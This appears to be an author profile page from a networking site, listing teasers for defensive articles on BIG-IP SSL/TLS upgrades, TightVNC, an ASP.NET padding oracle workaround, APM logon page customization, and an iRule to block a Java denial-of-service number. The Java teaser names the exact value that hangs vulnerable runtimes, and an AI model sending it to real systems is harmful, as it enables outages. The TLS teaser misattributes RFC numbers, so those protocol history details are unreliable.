It's not the Network! Ok, maybe it's the network...

Jason Rahm

Subscribe to Jason Rahm: eMailAlertsEmail Alerts
Get Jason Rahm via: homepageHomepage mobileMobile rssRSS facebookFacebook twitterTwitter linkedinLinkedIn

Top Stories by Jason Rahm

Happy to step aside and feature a community member's content as a guest article for this post. Please welcome Leonardo Souza to the ranks of DevCentral authors! Introduction If you have upgraded a F5 device (BIG-IP) before, you probably have faced SSL/TLS compatibility issues. That is not exclusive to F5 devices, but a general problem every time a new software version or functionality is released. In theory things should be compatible with previous version, but in reality most of the time it is not. When talking about encryption we use the term SSL, however when we start to discuss the technical details we need to differentiate SSL and TLS. I will not extend the SSL/TLS topic, as there is a good article in DevCentral that explains how a F5 device uses SSL/TLS. Basically, TLS 1.0 is defined in RFC 2246 in 1999, TLS 1.1 RFC 2246 in 2006, TLS 1.2 in RFC 4346 in 2008, a... (more)

The ABCs of NSM - T is for TightVNC

Welcome back for another (long overdue) episode of the ABC's of NSM.  What's NSM you say?  We'll go with Network and System Management, but you could throw Security in there as well.  We'll work our way through the alphabet over  the next several weeks looking at  tools and concepts along the way for all the administrators out     there.   By the way, you can thank Joe for the format & Don for the title  (I  couldn't for the life of me come up with one.) Today's letter T is for TightVNC. TightVNC is a remote desktop option for *nix/windows systems that comes with both server and... (more)

Let iRules Work Around that ASP.NET Padding Oracle Attack

Microsoft released advisory 2416728 on Friday after researchers Thai Duong and Juliano Rizzo demonstrated the attack on ASP.NET with their Padding Oracle Exploit Tool.  The attack itself preys on a bug in ASP.NET’s AES implementation, which you can read about over here at threatpost.  So what’s the reward for a successful attack?  It’s not going to allow the attacker to execute code or elevate rights, but it does all the attacker to read potentially sensitive data that could then be further used to compromise the system. The mitigation for this attack is to obfuscate the server ... (more)

BIG-IP APM–Customized Logon Page

The default logon page for the Access Policy Manager module is pretty basic, particularly so if only the minimal username and password is configured.  However, APM is wildly flexible.  In this tech tip, I’ll cover customizing the logon page by adding a dropdown box of services to the standard username and password fields. Introduction Background Information The goal here is to provide access to multiple web applications behind APM through the use of an admin-defined dropdown menu and different LTM pools for each web application. We will be generating the list dynamically through t... (more)

Mitigate Java Vulnerability with iRules

I got a request yesterday morning to asking if there was a way to drop HTTP requests if a certain number was referenced in the Accept-Language header.  The user referenced this post on Exploring Binary.  The number, 2.2250738585072012e-308, causes the Java runtime and compiler to go into an infinite loop when converting it to double-precision binary floating-point.  Not good.  Twitter is ablaze on the issue, and there is a good discussion thread on Hacker News as well.  So how do you stop it?  At first, this appeared to be a no-brainer, just copy that string and drop if found in that... (more)